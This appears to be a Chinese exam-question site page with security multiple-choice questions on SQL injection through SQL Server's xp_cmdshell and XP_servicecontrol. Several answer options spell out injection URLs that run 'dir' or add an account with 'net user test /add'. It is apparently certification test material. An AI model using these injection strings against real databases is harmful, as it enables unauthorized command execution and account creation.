网友您好，请在下方输入框内输入要搜索的题目：

搜题

题目内容（请给出正确答案）

提问人：网友lixin080108 发布时间：2022-01-07

[单选题]

以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程，启动或停止某项服务？（）

A.http://localhost/script0’;EXEC+master..XP_servicecontrol+’start’,+’ Server’;-

B.http://localhost/script0’;EXEC+master..XP_servicecontrol+’start’,+’ Server’;--

C.http://localhost/script1’;EXEC+master..XP_servicecontrol+’start’,+’ Server’;--

D.http://localhost/script0’;EXEC+master..XP_servicecontrol+’start’,+’ Server’—

参考答案

简答题官方参考答案（由简答题聘请的专业题库老师提供的解答）

查看官方参考答案

网友提供的答案

共位网友提供了参考答案，

查看全部

· 有3位网友选择 B，占比37.5%
· 有2位网友选择 D，占比25%
· 有2位网友选择 C，占比25%
· 有1位网友选择 A，占比12.5%

ABCD

提交我的答案

登录提交答案，可赢取奖励机会。登录

更多“以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程，启动或停止某项服务？（）”相关的问题

第1题

以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程，启动或停止某项服务？()

A、http://localhost/script？’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-

B、http://localhost/script？0’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--

C、http://localhost/script？1’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--

D、http://localhost/script？0’:EXEC+master..XP_servicecontrol+’start’,+’Server’--

点击查看答案

第2题

以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程，获得某个子目的清单？()

A、http://localhost/script？’:EXEC+master..XP_cmdshell+’dir’:--

B、http://localhost/script？1’:EXEC+master..XP_cmdshell+’dir’:--

C、http://localhost/script？0’:EXEC+master..XP_cmdshell+’dir’:--

D、http://localhost/script？1’:EXEC+master..XP_cmdshell+’dir’--

点击查看答案

第3题

以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程,获得某个子目的清单?()

A、http://localhost/script0’;EXEC+master..XP_cmdshell+’dir’;--

B、http://localhost/script1’;EXEC+master..XP_cmdshell+’dir’;--

C、http://localhost/script0’;EXEC+master..XP_cmdshell+’dir’;-

D、http://localhost/script0’;EXEC+master..XP_cmdshell+’dir’--

点击查看答案

第4题

SQL Sever中下面哪个存储过程可以执行系统命令？（）

A. xp_regread

B. xp_command

C. xp_cmdshell

D. sp_password

点击查看答案

第5题

对以下URL的说明正确的是()http:// 192.168.1.77/show.aspid=52;execmaster.dbo.xp_cmdshell 'net user test /add'

A、试图通过操作系统cmd.exe来添加帐户

B、试图通过该URL实施SQL注入攻击

C、试图调用xp_cmdshell存储过程执行系统命令

D、试图增加test帐户

点击查看答案

第6题

SQL Server使用()语句使一个存储过程在SQL Server启动时自动执行

A、sp_dbhelp

B、xp_cmdshell

C、sp_procoption

D、sp_addlogin

点击查看答案

第7题

除了在代码设计开发阶段预防SQL注入外,对数据库进行加固也能够把攻击者所能造成的损失控制在一定范围内,下列哪像不是数据库加固范围?()

A、禁止将任何高权限账户（例如sa，dba等等）用于应用程序数据库访问。更安全的方法是单独为应用创建有限访问账户

B、拒绝用户访问敏感的系统存储过程，如前面示例的xp_dirtree,xp_cmdshell等等

C、禁止用户访问的数据库表

D、限制用户所能够访问的数据库表

点击查看答案

第8题

sql Server中可以使用哪个储存过程调用操作系统命令,添加系统账号?()

A、xp_dirtree

B、xp_cmdshell

C、xp_regread

D、xp_regdeletekey

点击查看答案

第9题

支持Linux系统的第一个SQL Server版本是以下哪个？（）

A、SQL Server 2005

B、SQL Server 2008

C、SQL Server2016

D、SQL Server2017

点击查看答案

账号：尚未登录

登录没有账号？去注册

购买搜题卡

考试指南全部 >

空中乘务专业]（四川成人高考专升本）自考本科是不是不如大专含金量高吗农业资源与环境专业（工艺美术品设计专业） 2024年成人本科要学什么多久能考下证材料科学与工程专业（消防工程专业]） 2024年自考本科杭州可以用来人才引进吗含金量高吗 2024年10月江苏自考报名时间及考试时间是几月四川成人高考函授本科怎么报名？—2024年四川成考初中学历可以报考吗？ 2024成人本科自考报名条件及最全操作流程四川成考怎么查加分—2024年四川成考报考需要提前确定哪些事项？

购买搜题卡查看答案

购买前请仔细阅读《购买须知》

请选择支付方式

微信支付

支付宝支付

点击支付即表示你同意并接受《服务协议》和《购买须知》

立即支付已付款，但不能查看答案，请点这里登录即可>>

搜题卡使用说明

1. 搜题次数扣减规则：

功能	扣减规则
功能	基础费（查看答案）	加收费（AI功能）
文字搜题、查看答案	1/每题	0/每次
语音搜题、查看答案	1/每题	2/每次
单题拍照识别、查看答案	1/每题	2/每次
整页拍照识别、查看答案	1/每题	5/每次

备注：网站、APP、小程序均支持文字搜题、查看答案；语音搜题、单题拍照识别、整页拍照识别仅APP、小程序支持。

2. 使用语音搜索、拍照搜索等AI功能需安装APP（或打开微信小程序）。

3. 搜题卡过期将作废，不支持退款，请在有效期内使用完毕。

找回账号密码

联系在线客服

警告：系统检测到您的账号存在安全风险

为了保护您的账号安全，请在“简答题”公众号进行验证，点击“官网服务”-“账号验证”后输入验证码“”完成验证，验证成功后方可继续查看答案！

- 微信扫码关注简答题 -

警告：系统检测到您的账号存在安全风险

抱歉，您的账号因涉嫌违反简答题购买须知被冻结。您可在“简答题”微信公众号中的“官网服务”-“账号解封申请”申请解封，或联系客服。

- 微信扫码关注简答题 -

下载APP

关注公众号

TOP